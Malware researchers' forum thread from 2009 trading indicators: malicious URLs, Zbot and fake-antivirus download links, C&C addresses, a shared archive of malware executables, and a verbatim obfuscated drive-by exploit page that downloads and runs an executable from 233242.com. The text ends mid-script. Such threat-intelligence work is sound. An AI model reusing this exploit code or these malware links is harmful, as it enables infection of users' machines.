murka-best.com/include/spl.phphttp://wepawet.iseclab.org/view.php?hash=f6e9a5645ca288e481b17453d05491d0&t=1238524847&type=js

Trojan:
Code: [Select]
luks5.cn/unique/1.exehttp://www.virustotal.com/analisis/9cec63d35bafded6092bee37132e6e0a
Title: Re: daily something......
Post by: sowhat-x on April 01, 2009, 12:14:47 pm
Code: [Select]
hxxp://213.155.6.33/new/controller.php?action=bot&entity_list=One more c&c server in the same netblock,213.155.6.32 already spotted couple days ago...

Code: [Select]
hxxp://213.155.4.82/new/controller.php?action=bot&entity_list=C&C server,213.155.4.80 also spotted earlier in the same netblock...

For sparsha - as i know he has a special preference in fake AVs...  :)
Code: [Select]
hxxp://pornorawa.com
hxxp://sys-scan-1.biz
hxxp://sys-scanner-1.biz/download.php?page=
hxxp://www.system-protector.net/

Few more fake AVs...
Code: [Select]
hxxp://pcsolutionshelp.com/
hxxp://download.pcsolutionshelp.com/secure/fb4b4716a45f37c3694efcab0d41ee69/49d376e5/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
hxxp://malwareremovingtool.com/
hxxp://download.malwareremovingtool.com/secure/ab3dc06cc30452c69f2a70caf88d36bb/49d376e5/AntiMalwareGF_Rezer.exe

Code: [Select]
hxxp://download.malwareremovingtool.com/  -> Open dir...have fun ;-)
Title: Re: daily something......
Post by: sowhat-x on April 01, 2009, 04:21:38 pm
http://www.megaupload.com/?d=8L92M1AS
Just in case they take notice of it quickly and fix the directory read permissions,
i've archived the contents of download.malwareremovingtool.com:
58mb archive containing 22 executables,no password needed...
Title: Re: daily something......
Post by: CkreM on April 01, 2009, 04:30:54 pm
Exploits/trojan
Code: [Select]
http://megabot.cn/index.phphttp://wepawet.iseclab.org/view.php?hash=a95957a8b26780652b9900b284787dbc&t=1238602058&type=js

Redirects to exploits:
Code: [Select]
http://loskut.cn/cotton.htmlhttp://wepawet.iseclab.org/view.php?hash=286bf4c04744e908b56a31102a09ac69&t=1238590602&type=js
Code: [Select]
http://ufomany.by.ruhttp://wepawet.iseclab.org/view.php?hash=fdb7fd5376b78cb765a7c9611b9bd053&t=1238595797&type=js

Zbot:
Code: [Select]
http://211.95.79.114/load/ldr.exehttp://www.virustotal.com/analisis/3800cd2ec6b09e059fcbe102d7e54b39
Title: Re: daily something......
Post by: CM_MWR on April 01, 2009, 06:00:28 pm
List I was working on before i had my memory loss.  ???

Code: [Select]
http://amnepofig.ru/test/loader.exe
http://www.mydataporch.com/bot.exe
http://www.cplnn.com/bbot.exe
http://web.cplnn.com/mmf32.exe
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/podmena.exe
http://edwardhomepage.info/172.exe
http://edwardhomepage.info/88.exe
http://edwardhomepage.info/adv.exe
http://edwardhomepage.info/podmena.exe
http://usabreakingnews.com/172.exe
http://usabreakingnews.com/88.exe
http://usabreakingnews.com/adv.exe
http://usabreakingnews.com/fuck3.exe
http://tmr-unlimited.com/172.exe
http://tmr-unlimited.com/setup.exe
http://tmr-unlimited.com/adv.exe
http://tmr-unlimited.com/fuck3.exe
http://tryithere.net/fuck3.exe
http://tryithere.net/88.exe
http://tryithere.net/l.exe
http://tryithere.net/adv.exe
http://tri-visionhomes.com/im/172.exe
http://tri-visionhomes.com/im/podmena.exe
http://tri-visionhomes.com/im/adv.exe
http://tri-visionhomes.com/im/s.exe
http://keepongoing.info/172.exe
http://keepongoing.info/secure.exe
http://211.95.78.66/ruzs/readme.txt
http://91.212.65.12/o9s833f/uerty/setup.exe
http://91.212.65.12/o9s833f/uerty/upd_beta.exe
http://195.88.80.150/myfiles/123/v302/file.exe
http://193.138.173.160/myfiles/100/v300/file.exe
http://193.138.173.160/myfiles/123/v302/file.exe
http://77.221.153.174/.c/o/rdr.exe
http://basesrv.net/base/kernel32.exe
http://91.207.61.180/images/138/v3/file.exe
http://aksajans.com/gif/nfr.exe
http://aksajans.com/gif/pp.03.exe
http://211.95.78.66/log/ldr.txt
http://powelldirects.com/stat/main.exe
http://zyujgss.com/zos/ue.exe
http://incredible.kiev.ua/suez/ldr.exe

I think many are gone bye bye now.  :-\
Title: Re: daily something......
Post by: CkreM on April 01, 2009, 08:26:27 pm
Zbot:

Code: [Select]
http://ctuf.info/ldr.exe
http://ctuf.info/cfg.bin
http://zeus-logs.biz/ldr.exe
http://zeus-logs.biz/cfg.bin
Title: Re: daily something......
Post by: SysAdMini on April 02, 2009, 08:23:06 pm
Code: [Select]
paksusic.cn/nuc/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=54bef4b232fec015b149b37a0c11fb9a&t=1238703827&type=js
http://www.virustotal.com/analisis/5566b16433e8c935625315dd76f619bf
Title: Re: daily something......
Post by: CkreM on April 02, 2009, 10:21:11 pm
Exploit which leads to trojan on MDL already:
Code: [Select]
http://dnsmytruedns.com/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=a6ddc93d17f80b8200c9dffa41b5a3a0&t=1238704964&type=js

Other trojan there:
Code: [Select]
http://dnsmytruedns.com/nuc/exe.phphttp://www.virustotal.com/analisis/20fbf18e0a83f244a8a9a9a68068db80

Redirect to exploits:
Code: [Select]
http://aaaimmigration.com/http://wepawet.iseclab.org/view.php?hash=7cb8f06a3c45746da10f644b71027a98&t=1238706643&type=js

Exploits/trojan:
Code: [Select]
http://p0rn-movies.com/77/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=a2982470cd2fbee7be138128ef6e8d0d&t=1238707074&type=js

Trojan:
Code: [Select]
http://findwife.asia/unique/1.exehttp://www.virustotal.com/analisis/6eae1c969cc3e7aae2f7ae0982be3bef

Exploit/Trojan:
Code: [Select]
http://193.200.255.19/~timchenko/cms/index.phphttp://wepawet.iseclab.org/view.php?hash=832a4879ab612a34ba0c854471d72747&t=1238714177&type=js

Redirect to fake Av:
Code: [Select]
http://kogerta.com/redirect/bucks.php
fake AV :
Code: [Select]
system-scan-1.biz
Exploit/trojan:
Code: [Select]
http://hostyapics.net/img/index.phphttp://wepawet.iseclab.org/view.php?hash=9e754a227c062120b20e7864e1e4ed59&t=1238720525&type=js
Title: Re: daily something......
Post by: GmG on April 03, 2009, 02:54:47 pm
Koobface

Code: [Select]
http://xviewworldmy1.com/download/1/1000/5
http://viewworldmy1.com/download/1/1000/5
Title: Re: daily something......
Post by: SysAdMini on April 03, 2009, 06:39:02 pm
exploits/trojan
Code: [Select]
www.homesy.net/zel/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=e5e78672b3f7a7e8c52cda045bd24bf1&t=1238782592&type=js
http://www.virustotal.com/analisis/445d8300ab224462d9a00448318abe1a
Title: Re: daily something......
Post by: SysAdMini on April 04, 2009, 06:46:25 am
exploits/trojan
Code: [Select]
ispacemac.ru/1/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=049acfef69985d06934cb5d5e5098311&t=1238827604&type=js
http://www.virustotal.com/analisis/13954a7dd49b63eca41859e756b0e0a5

exploits/trojan
Code: [Select]
2icqmag.ru/mix/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=f1fb4e76dc9849b5a935d5b0d7c65553&t=1238827889&type=js
http://www.virustotal.com/analisis/a766c088385f0b406438e4051e821731
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 05:02:56 pm
Fake AVs

Those ones were reported from Steven as located at zlkon, but we have been moved to ip 64.191.12.38.
Code: [Select]
antispylinks.com
antispyme.com
antispywareup.com
antiviruscheckout.com
antivirusup.com
goldpcguard.com
pcsecuretools.com

Reported by Anthony
Code: [Select]
78.26.179.131

best-tube-home.com

78.26.179.137

files.ms-loads-av.com/exe/setup_1_2_1.exe

66.197.154.198

goscanside.com
scan6zoom.com
scan6safe.com
userscan6.com
litescan6.com

209.44.126.14

fastsecurityscan.com
thegreatsecurity.com
truescansecurity.com
topsoftscanner.com/download.php
topsoftscanner.com/install/ws.zip

213.163.65.10

iloveyourbrain.com/scan/
loyal-tube.com/codec.exe
loyaldown99.com/codec.exe
loyaltube09.com/codec.exe
rakompoporyadkunazaryadku.com/codec.exe
ruler-domains.com/codec.exe
setupdatdownload.com/codec.exe
tube-loyal.com/codec.exe
tubeloyal.com/codec.exe
tubeloyaln.com/codec.exe
billingpayment.netcodecs.tubeloyaln.com/codec.exe
lamer.tubeloyaln.com/codec.exe
videosz.tubeloyaln.com/codec.exe
wedare.tubeloyaln.com/codec.exe
velzevuladmin.com/codec.exe
winpcdown09.com/codec.exe
winpcdown99.com/codec.exe
xp-police-09.com/codec.exe
xp-police-2009.com/codec.exe
xp-police-antivirus.com/codec.exe
xp-police-av.com/codec.exe
xp-police-engine.com/codec.exe
xp-police.com/codec.exe
*.xp-police.com/codec.exe

92.38.0.41

wincodecupdate.com/codec.exe

94.76.213.227

antispywareproupdates.com/zsa360/winconfig.dll

78.46.216.233

onlinerobosphere.cn/zsa360/winconfig.dll

212.117.165.126

platinumsecurityupdate.com/zsa360/winconfig.dll
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 06:36:14 pm
Worm Win32/Boupke / Kernelbot (MS08-067)
Code: [Select]
freegoogla.vicp.net/download/em_setup.exehttp://www.virustotal.com/analisis/b58be0446e889229f163a6364e6279b1

Code: [Select]
94.23.93.6/firefox.exehttp://www.virustotal.com/analisis/0ff709c880ddbb9c8aa71d67593a0921 2/40
AntiVir    7.9.0.138    2009.04.05    TR/Crypt.XPACK.Gen
McAfee-GW-Edition    6.7.6    2009.04.03    Win32.Malware.dam (suspicious)
http://www.threatexpert.com/report.aspx?md5=39ee3f7eb571d59250df79914a7e8dbb

Code: [Select]
94.23.93.6/IEXPLORE.exehttp://www.virustotal.com/analisis/ffab02c5126508421194fcf00c6d50d1 5/40
http://www.threatexpert.com/report.aspx?md5=825cd2850f2d0d60d142adb65b35f575

Code: [Select]
irc.C3llBl0ck.com Port 9595C&C for the firefox.exe and IEXPLORE.exe above.
Title: Re: daily something......
Post by: CM_MWR on April 05, 2009, 06:45:34 pm
233242.com/1/include/spl.php?do=foxit
233242.com/1/index.php
233242.com/1/load.php
http://www.virustotal.com/analisis/94c84868ce8339d909b4b344275e1710

I believe reports to

newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099



233242.com/1/
Code: [Select]
<style>.dsA86BSFIK_41K{display:none;}</style>
<b class="dsA86BSFIK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="dsA86BSFIK_41K" id="dsA86BSFIK_41K">13.10.118.97.114.32.75.95.52.49.75.65.113.112.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.118.97.114.32.75.95.52.49.75.66.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.37.52.49.68.37.52.70.68.66.37.50.101.83.116.114.101.97.37.54.68.34.41.59.32.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.65.113.112.39.41.59.13.10.118.97.114.32.75.95.52.49.75.67.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.109.115.120.109.108.50.46.88.37.52.68.76.72.37.53.52.84.80.34.41.59.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.115.105.100.58.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.113.112.32.61.32.48.59.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.44.34.34.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.33.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.61.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.70.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.44.34.34.41.59.13.10.118.97.114.32.75.95.52.49.75.75.113.112.32.61.32.48.120.55.70.70.70.70.70.70.69.59.13.10.118.97.114.32.75.95.52.49.75.71.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.67.113.112.41.59.13.10.75.95.52.49.75.71.113.112.46.111.112.101.110.40.34.71.69.84.34.44.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.44.102.97.108.115.101.41.59.32.13.10.75.95.52.49.75.71.113.112.46.115.101.110.100.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.69.113.112.46.111.112.101.110.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.87.114.105.116.101.40.75.95.52.49.75.71.113.112.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.72.113.112.32.61.32.34.67.58.92.92.78.84.68.69.84.69.67.84.46.69.88.69.34.59.13.10.75.95.52.49.75.69.113.112.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.72.113.112.44.50.41.59.32.13.10.75.95.52.49.75.69.113.112.46.99.108.111.115.101.40.41.59.13.10.75.95.52.49.75.70.113.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.75.95.52.49.75.72.113.112.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("dsA86BSFIK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.kUbS1mK_41K{display:none;}</style>
<b class="kUbS1mK_41K" id="K_41K1">@e!@@@v@!@a@l!@</b>
<script>window.onerror = return(true);</script>
<div class="kUbS1mK_41K" id="kUbS1mK_41K">75.95.52.49.75.97.110.114.40.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.97.110.114.40.41.32.123.13.10.118.97.114.32.75.95.52.49.75.98.110.114.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.98.110.114.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.39.43.39.115.105.39.43.34.100.58.66.68.34.43.34.57.54.67.53.34.43.39.53.54.45.54.53.65.51.45.49.39.43.34.49.68.48.45.57.56.34.43.39.51.65.45.48.48.39.43.34.67.48.52.34.43.39.70.67.50.39.43.34.57.69.34.43.39.51.54.39.41.59.13.10.116.114.121.32.123.13.10.118.97.114.32.75.95.52.49.75.67.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.109.115.39.43.34.120.109.34.43.39.108.50.39.43.34.46.34.43.39.88.77.39.43.34.76.72.34.43.39.84.39.43.39.84.80.39.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.34.43.34.108.46.65.112.34.43.34.112.108.34.43.34.105.99.97.116.105.34.43.34.111.110.34.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.69.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.97.100.39.43.39.111.100.39.43.34.98.46.34.43.39.115.116.39.43.34.114.101.34.43.39.97.109.39.44.39.39.41.59.13.10.116.114.121.32.123.32.75.95.52.49.75.69.110.114.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.67.110.114.46.111.112.101.110.40.39.71.39.43.34.69.34.43.39.84.39.44.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.44.102.97.108.115.101.41.59.13.10.75.95.52.49.75.67.110.114.46.115.101.110.100.40.41.59.32.75.95.52.49.75.69.110.114.46.111.112.101.110.40.41.59.13.10.75.95.52.49.75.69.110.114.46.87.114.105.116.101.40.75.95.52.49.75.67.110.114.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.70.110.114.32.61.32.39.46.47.47.46.46.47.47.115.118.99.104.111.115.116.46.101.120.101.39.59.13.10.75.95.52.49.75.69.110.114.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.70.110.114.44.50.41.59.13.10.75.95.52.49.75.69.110.114.46.67.108.111.115.101.40.41.59.13.10.125.32.99.97.116.99.104.40.101.41.32.123.125.13.10.116.114.121.32.123.32.75.95.52.49.75.68.110.114.46.115.104.101.108.108.101.120.101.99.117.116.101.40.75.95.52.49.75.70.110.114.41.59.32.125.32.99.97.116.99.104.40.101.41.32.123.125.125.13.10.99.97.116.99.104.40.101.41.123.125.125</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|@]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("kUbS1mK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.IkZaQm6AojiWK_41K{display:none;}</style>
<b class="IkZaQm6AojiWK_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="IkZaQm6AojiWK_41K" id="IkZaQm6AojiWK_41K">13.10.118.97.114.32.75.95.52.49.75.65.101.119.61.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.66.101.119.40.111.44.110.41.123.13.10.118.97.114.32.114.61.110.117.108.108.59.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.34.34.44.110.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.125.114.101.116.117.114.110.40.114.41.59.13.10.125.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.67.101.119.40.97.41.123.13.10.102.110.97.109.101.61.34.102.105.108.101.46.101.120.101.34.59.118.97.114.32.75.95.52.49.75.68.101.119.61.97.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.99.114.105.112.116.105.110.103.46.70.105.108.101.83.121.115.116.101.109.79.98.106.101.99.116.34.44.34.34.41.59.118.97.114.32.115.97.112.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.118.97.114.32.120.61.75.95.52.49.75.66.101.119.40.97.44.34.65.68.79.68.66.46.83.116.114.101.97.109.34.41.59.118.97.114.32.75.95.52.49.75.69.101.119.61.110.117.108.108.59.102.110.97.109.101.61.75.95.52.49.75.68.101.119.46.66.117.105.108.100.80.97.116.104.40.75.95.52.49.75.68.101.119.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.40.50.41.44.102.110.97.109.101.41.59.120.46.77.111.100.101.61.51.59.13.10.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.105.99.114.111.115.111.102.116.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.83.101.114.118.101.114.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.13.10.123.13.10.116.114.121.13.10.123.13.10.75.95.52.49.75.69.101.119.61.110.101.119.32.88.77.76.72.116.116.112.82.101.113.117.101.115.116.40.41.59.13.10.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.114.101.116.117.114.110.32.48.59.125.125.125.125.13.10.120.46.84.121.112.101.61.49.59.75.95.52.49.75.69.101.119.46.115.101.110.100.40.110.117.108.108.41.59.114.98.61.75.95.52.49.75.69.101.119.46.114.101.115.112.111.110.115.101.66.111.100.121.59.120.46.79.112.101.110.40.41.59.120.46.87.114.105.116.101.40.114.98.41.59.120.46.83.97.118.101.84.111.102.105.108.101.40.102.110.97.109.101.44.50.41.59.115.97.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.102.110.97.109.101.41.59.13.10.114.101.116.117.114.110.32.49.59.13.10.125.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.70.101.119.40.41.123.13.10.118.97.114.32.105.61.48.59.118.97.114.32.75.95.52.49.75.71.101.119.61.110.101.119.32.65.114.114.97.121.40.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.44.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.48.39.44.39.65.66.57.66.67.69.68.68.45.69.67.55.69.45.52.55.69.49.45.57.51.50.50.45.68.52.65.50.49.48.54.49.55.49.49.54.39.44.39.48.48.48.54.70.48.51.51.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.48.48.48.54.70.48.51.65.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.54.101.51.50.48.55.48.97.45.55.54.54.100.45.52.101.101.54.45.56.55.57.99.45.100.99.49.102.97.57.49.100.50.102.99.51.39.44.39.54.52.49.52.53.49.50.66.45.66.57.55.56.45.52.53.49.68.45.65.48.68.56.45.70.67.70.68.70.51.51.69.56.51.51.67.39.44.39.55.70.53.66.55.70.54.51.45.70.48.54.70.45.52.51.51.49.45.56.65.50.54.45.51.51.57.69.48.51.67.48.65.69.51.68.39.44.39.48.54.55.50.51.69.48.57.45.70.52.67.50.45.52.51.99.56.45.56.51.53.56.45.48.57.70.67.68.49.68.66.48.55.54.54.39.44.39.54.51.57.70.55.50.53.70.45.49.66.50.68.45.52.56.51.49.45.65.57.70.68.45.56.55.52.56.52.55.54.56.50.48.49.48.39.44.39.66.65.48.49.56.53.57.57.45.49.68.66.51.45.52.52.102.57.45.56.51.66.52.45.52.54.49.52.53.52.67.56.52.66.70.56.39.44.39.68.48.67.48.55.68.53.54.45.55.67.54.57.45.52.51.70.49.45.66.52.65.48.45.50.53.70.53.65.49.49.70.65.66.49.57.39.44.39.69.56.67.67.67.68.68.70.45.67.65.50.56.45.52.57.54.98.45.66.48.53.48.45.54.67.48.55.67.57.54.50.52.55.54.66.39.44.110.117.108.108.41.59.13.10.119.104.105.108.101.40.75.95.52.49.75.71.101.119.91.105.93.41.13.10.123.13.10.118.97.114.32.97.61.110.117.108.108.59.13.10.97.61.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.34.111.98.106.101.99.116.34.41.59.13.10.97.46.115.101.116.65.116.116.114.105.98.117.116.101.40.34.99.108.97.115.115.105.100.34.44.34.99.108.115.105.100.58.34.43.75.95.52.49.75.71.101.119.91.105.93.41.59.13.10.105.102.40.97.41.123.116.114.121.123.118.97.114.32.98.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.13.10.105.102.40.98.41.123.105.102.40.75.95.52.49.75.67.101.119.40.97.41.41.114.101.116.117.114.110.32.49.59.125.125.99.97.116.99.104.40.101.41.123.125.125.13.10.105.43.43.59.13.10.125.13.10.125.13.10.105.102.40.75.95.52.49.75.70.101.119.40.41.41.32.115.117.99.99.101.115.115.61.49.59.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("IkZaQm6AojiWK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
